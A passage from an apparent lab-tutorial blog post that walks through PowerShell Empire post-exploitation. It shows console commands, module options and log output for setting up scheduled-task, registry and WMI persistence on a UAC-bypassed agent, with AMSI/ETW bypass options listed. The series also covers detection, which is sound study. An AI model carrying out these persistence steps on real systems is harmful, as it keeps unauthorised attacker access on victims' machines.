default │ False │ Proxy to use for request (default, │ │ │ │ │ none, or other). │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ProxyCreds │ default │ False │ Proxy credentials │ │ │ │ │ ([domain\]username:password) to use │ │ │ │ │ for request (default, none, or │ │ │ │ │ other). │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ RegPath │ HKLM:\Software\Microsoft\Network\de │ False │ Registry location to store the │ │ │ bug │ │ script code. Last element is the │ │ │ │ │ key name. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ TaskName │ SecurityNik-Empire-Schtask │ True │ Name to use for the schtask. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ UserAgent │ Securitynik-Persistence-Schtasks- │ False │ User-agent string to use for the │ │ │ UserAgent │ │ staging request (default, none, or │ │ │ │ │ other). │ └──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘ (Empire: usemodule/powershell/persistence/elevated/schtasks) > execute [*] Tasked SANS560HighPrivBypassUAC to run Task 19
Looking at the agent.log.
2021-11-20 21:33:56 : tasked agent SANS560HighPrivBypassUAC to run module Invoke-Schtasks 2021-11-20 21:34:16 : SUCCESS: The scheduled task "SecurityNik-Empire-Schtask" has successfully been created. Schtasks persistence established using listener http stored in HKLM:\Software\Microsoft\Network\debug with SecurityNik-Empire-Schtask OnLogon trigger.
Leveraging the registry persistence.
(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/elevated/registry [*] Set Agent to SANS560HighPrivBypassUAC (Empire: usemodule/powershell/persistence/elevated/registry) > set UserAgent SecurityNik-Registry-Persistence [*] Set UserAgent to SecurityNik-Registry-Persistence (Empire: usemodule/powershell/persistence/elevated/registry) > set Listener http [*] Set Listener to http (Empire: usemodule/powershell/persistence/elevated/registry) > options ┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐ │ Name │ Value │ Required │ Description │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ADSPath │ │ False │ Alternate-data-stream location to │ │ │ │ │ store the script code. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Agent │ SANS560HighPrivBypassUAC │ True │ Agent to run module on. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Bypasses │ mattifestation etw │ False │ Bypasses as a space separated list │ │ │ │ │ to be prepended to the launcher. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Cleanup │ │ False │ Switch. Cleanup the trigger and any │ │ │ │ │ script from specified location. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ExtFile │ │ False │ Use an external file for the │ │ │ │ │ payload instead of a stager. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ KeyName │ Updater │ True │ Key name for the run trigger. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Listener │ http │ False │ Listener to use. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Obfuscate │ False │ False │ Switch. Obfuscate the launcher │ │ │ │ │ powershell code, uses the │ │ │ │ │ ObfuscateCommand for obfuscation │ │ │ │ │ types. For powershell only. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ObfuscateCommand │ Token\All\1 │ False │ The Invoke-Obfuscation command to │ │ │ │ │ use. Only used if Obfuscate switch │ │ │ │ │ is True. For powershell only. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Proxy │ default │ False │ Proxy to use for request (default, │ │ │ │ │ none, or other). │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ProxyCreds │ default │ False │ Proxy credentials │ │ │ │ │ ([domain\]username:password) to use │ │ │ │ │ for request (default, none, or │ │ │ │ │ other). │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ RegPath │ HKLM:SOFTWARE\Microsoft\Windows\Cur │ False │ Registry location to store the │ │ │ rentVersion\Debug │ │ script code. Last element is the │ │ │ │ │ key name. │ ├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤ │ UserAgent │ SecurityNik-Registry-Persistence │ False │ User-agent string to use for the │ │ │ │ │ staging request (default, none, or │ │ │ │ │ other). │ (Empire: usemodule/powershell/persistence/elevated/registry) > execute [*] Tasked SANS560HighPrivBypassUAC to run Task 21
Looking at the agent.log.
2021-11-20 21:51:27 : tasked agent SANS560HighPrivBypassUAC to run module Invoke-Registry 2021-11-20 21:52:18 : Registry persistence established using listener http stored in HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug.
Finally, persistence via WMI.
(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/elevated/wmi [*] Set Agent to SANS560HighPrivBypassUAC (Empire: usemodule/powershell/persistence/elevated/wmi) > set UserAgent SecurityNik-WMI-Persistence [*] Set UserAgent to SecurityNik-WMI-Persistence (Empire: usemodule/powershell/persistence/elevated/wmi) > set DailyTime 09:00 [*] Set DailyTime to 09:00 (Empire: usemodule/powershell/persistence/elevated/wmi) > set Listener http [*] Set Listener to http (Empire: usemodule/powershell/persistence/elevated/wmi) > options ┌Record Options─────────────────────────────┬──────────┬─────────────────────────────────────┐ │ Name │ Value │ Required │ Description │ ├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Agent │ SANS560HighPrivBypassUAC │ True │ Agent to run module on. │ ├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤ │ AtStartup │ True │ False │ Switch. Trigger script (within 5 │ │ │ │ │ minutes) of system startup. │ ├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Cleanup │ │ False │ Switch. Cleanup the trigger and any │ │ │ │ │ script from specified location. │ ├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤ │ DailyTime │ 09:00 │ False │ Daily time to trigger the script │ │ │ │ │ (HH:mm). │ ├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ExtFile │ │ False │ Use an external file for the │ │ │ │ │ payload instead of a stager. │ ├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤ │ FailedLogon │ │ False │ Trigger script with a failed logon │ │ │ │ │ attempt from a specified user │ ├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Listener │ http │ True │ Listener to use. │ ├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤ │ Proxy │ default │ False │ Proxy to use for request (default, │ │ │ │ │ none, or other). │ ├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤ │ ProxyCreds │ default │ False │ Proxy credentials │ │ │ │ │ ([domain\]username:password) to use │ │ │ │ │ for request (default, none, or │ │ │ │ │ other). │ ├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤ │ SubName │ Updater │ True │ Name to use for the event │ │ │ │ │ subscription. │ ├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤ │ UserAgent │ SecurityNik-WMI-Persistence │ False │ User-agent string to use for the │ │ │ │ │ staging request (default, none, or │ │ │ │ │ other). │ └─────────────┴─────────────────────────────┴──────────┴─────────────────────────────────────┘ (Empire: usemodule/powershell/persistence/elevated/wmi) > execute [*] Tasked SANS560HighPrivBypassUAC to run Task 22
Looking at the agent.log file.
2021-11-20 22:10:58 : tasked agent SANS560HighPrivBypassUAC to run module Invoke-WMI 2021-11-20 22:11:20 : WMI persistence established using listener http WMI subscription daily trigger at 09:00.
10. That's it.
2021-11-21 19:14:07 : [!] Agent 73H864SX exiting: past killdate
There is so much more than can be learned here. However, this is enough for me at this point. I believe I have achieved my objective.
Other posts in this series:
Beginning Powershell Empire - The Attack in 10 steps
Powershell Empire Log Analysis
Powershell Empire Packet Analysis
Powershell Empire Detection with Snort
Powershell Empire - Detection with Zeek
References:
https://www.powershellempire.com/?page_id=110
http://www.powershellempire.com/?page_id=147
http://www.powershellempire.com/?page_id=104
https://hackmag.com/security/powershell-empire/
http://www.powershellempire.com/?page_id=378
https://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/
https://labs.f-secure.com/blog/attack-detection-fundamentals-c2-and-exfiltration-lab-1/
https://www.ivoidwarranties.tech/posts/pentesting-tuts/empire/guide/
https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/
No comments:
Post a Comment